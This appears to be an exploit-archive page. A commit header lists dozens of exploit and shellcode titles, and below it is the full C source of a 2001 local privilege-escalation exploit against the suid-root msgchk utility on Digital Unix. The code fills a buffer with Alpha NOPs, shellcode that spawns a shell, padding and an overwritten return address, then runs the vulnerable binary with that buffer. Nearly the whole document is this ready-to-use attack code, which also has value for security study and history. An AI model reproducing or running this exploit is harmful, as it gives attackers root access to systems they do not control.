880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
104 lines
No EOL
3.9 KiB
C
104 lines
No EOL
3.9 KiB
C
// source: https://www.securityfocus.com/bid/3311/info
|
|
|
|
The msgchk utility under certain versions of Digital Unix contains a buffer overflow vulnerability which could yield root privilege.
|
|
|
|
If a local user invokes the msgchk utility at the command line, argumented with a sufficiently long string of bytes, a buffer overflow condition can be triggered. Where msgchk runs suid root, this can allow hostile code to be executed as root, granting an attacker administrative access to the vulnerable system.
|
|
|
|
++ msgchkx.c
|
|
|
|
/*
|
|
* 2001/09/05 - at the bench of windy fall
|
|
* /usr/bin/mh/msgchk buffer overflow exploit code by truefinder ,
|
|
seo@igrus.inha.ac.kr
|
|
* now we will drill /usr/bin/mh/msgchk
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
#define NOP 0x47ff041f
|
|
#define ALIGNSIZE (4 + 1 )
|
|
#define BUFSIZE (8000 + 211 )
|
|
#define RETADDR 0x000000011ffffaa0
|
|
#define DEFNOPSIZE 7168
|
|
|
|
char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
|
|
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };
|
|
|
|
static char shellcode[] =
|
|
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
|
|
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
|
|
"\x12\x94\x07\x42" /* addq $16,60,$18 */
|
|
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
|
|
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
|
|
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
|
|
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
|
|
"\xf9\xff\x1f\xd2" /* bsr $16,-28 */
|
|
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
|
|
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
|
|
"\x12\x04\xff\x47" /* clr $18 */
|
|
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
|
|
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
|
|
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
|
|
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
|
|
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
|
|
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
|
|
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
|
|
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
|
|
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
|
|
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
|
|
"\x20\x35\x60\x42" /* subq $19,1,$0 */
|
|
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
|
|
/* oh! this is ohhara's shellcode */
|
|
|
|
int
|
|
main(int argc, char *argv[] )
|
|
{
|
|
|
|
char *buf , *buf_ptr;
|
|
int bufsize , alignsize , offset ;
|
|
int i, totalsize;
|
|
|
|
bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;
|
|
|
|
if ( argc < 1 ) {
|
|
printf("usage : %s <bufsize> <align> <offset>\n",
|
|
argv[0]);
|
|
exit (-1);
|
|
}
|
|
|
|
if (argc > 1 )
|
|
bufsize = atoi( argv[1] );
|
|
|
|
if ( argc > 2 )
|
|
alignsize = atoi( argv[2] ) + ALIGNSIZE ;
|
|
|
|
if ( argc > 3 )
|
|
offset = atoi ( argv[3] );
|
|
|
|
totalsize = alignsize + bufsize ;
|
|
buf = malloc( totalsize ) ;
|
|
|
|
|
|
memset ( buf, NULL , totalsize );
|
|
|
|
memset ( buf, 'A', alignsize );
|
|
buf_ptr = (char *)(buf + alignsize );
|
|
|
|
/* default nop size is 4096 bytes */
|
|
for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ )
|
|
strcat ( buf_ptr , nop );
|
|
|
|
strcat ( buf_ptr, shellcode );
|
|
|
|
/* fill the block with 'A' */
|
|
for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ;
|
|
i++ )
|
|
strcat( buf_ptr ,"A");
|
|
|
|
strcat ( buf_ptr , retaddr );
|
|
|
|
execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL );
|
|
} |